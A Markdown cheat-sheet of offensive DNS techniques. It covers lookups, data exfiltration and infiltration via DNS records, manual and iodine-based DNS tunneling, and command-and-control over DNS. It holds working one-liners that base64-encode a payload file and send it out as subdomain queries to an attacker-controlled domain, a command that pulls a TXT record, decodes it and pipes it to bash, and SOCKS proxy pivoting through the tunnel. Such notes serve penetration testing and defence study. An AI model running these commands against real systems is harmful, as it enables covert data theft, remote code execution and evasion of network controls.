# DNS

* [Root Servers](https://www.iana.org/domains/root/servers)
* [Zones](https://www.cloudflare.com/learning/dns/glossary/dns-zone/)
* [Records](https://www.cloudflare.com/learning/dns/dns-records/)

## Queries

### nslookup

```sh
nslookup type=txt <domain>
```

### Reverse lookup

* Stored inside `PTR` record
* Reverse IP may look like `<IP>.in-addr.arpa.`, but not via `drill` or `dig`
```sh
drill -x +short <IP>
```

## Exfiltration

* Add data to UDP DNS requests
* Capture traffic on an owned DNS server
* `253` is the max length of a DNS name, excluding dots
* `63` is the mx length of subdomains
* Encode the payload to hide it 

## Infiltration

* Inside `TXT` or any other possible records

## Usage

### Manual Tunneling

Preconditions are:
    1. Domain with an `A` record
    2. `NS` record to controlled DNS to resolve the domain query

* Attach the encoded payload as the subdomain
```sh
base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/'
```

* Query the DNS server
```sh
base64 -w0 <payload.txt> | fold -w 24 | sed -r 's/.*/&.example.com/' | awk '{print "dig +short $1"}' | bash
```

* Optionally putting the payload in a single query via
```sh
base64 -w0 <payload.txt> | fold -w 24 | sed 's/.*/&./' | tr -d '\n' | sed 's/$/example.com/' | awk '{print "dig +short" $1}' | bash
```

* Decode received data on the controlled DNS server via
```sh
echo "DomainBase64encoded.example.com" | sed 's/\.example\.com//;s/\.//g' | base64 -d
```

### Tunneling via Iodine

* [Tunnel IPv4 Data through DNS](https://github.com/yarrick/iodine.git)
* Encapsulate protocols in side the DNS tunnel

* Start server on an outside DNS server. This may be a evs.
```sh 
iodined -b <optionalListeningPort> -f 10.0.0.1</optionalCIDR> -c -P <optionalPassword> tunnel.test.com
```

* Use client via
```sh
iodine -f -r <optionalServer-IP> -P <optionlPassword>  tunnel.test.com
```

* `NS` record of the owned domain should contain the subdomain, e.g. `tunnel.test.com`
* Client gets a tunnel IP in the range of `10.0.0.0/8`
* Check connection via 
```sh
ping <server-IP>
```

* Generate ssh-key and put in on the server
* Dynamic port forwarding to the network through the server as a proxy via ssh
```sh
ssh <user>@10.0.0.1 -4 -f -N -D <8080/1080>
```

* User proxy server on the client's web server like `--proxy-server` or use a SOCKS proxy like FoxyProxy, or proxychains
```sh
proxychains curl http://$TARGET_IP/
curl --socks5 localhost:1080 http://$
```
    
### C2 over DNS

* Preconditions are the same as [Manual Tunneling](#Manual Tunneling)
    * Plus: Data to control the appliances will be put into `TXT` record
    * Data to control the appliances may be a shell script sending payloads via ICMP data field, DNS subdomains or execute something locally on the target

* Encode the payload and add it as `TXT` record
```sh
base64 ./script.sh
```

* Query and execute on target
```sh
dig +short -t TXT script.example.com | sed 's/\"//g'| base64 -d | bash
```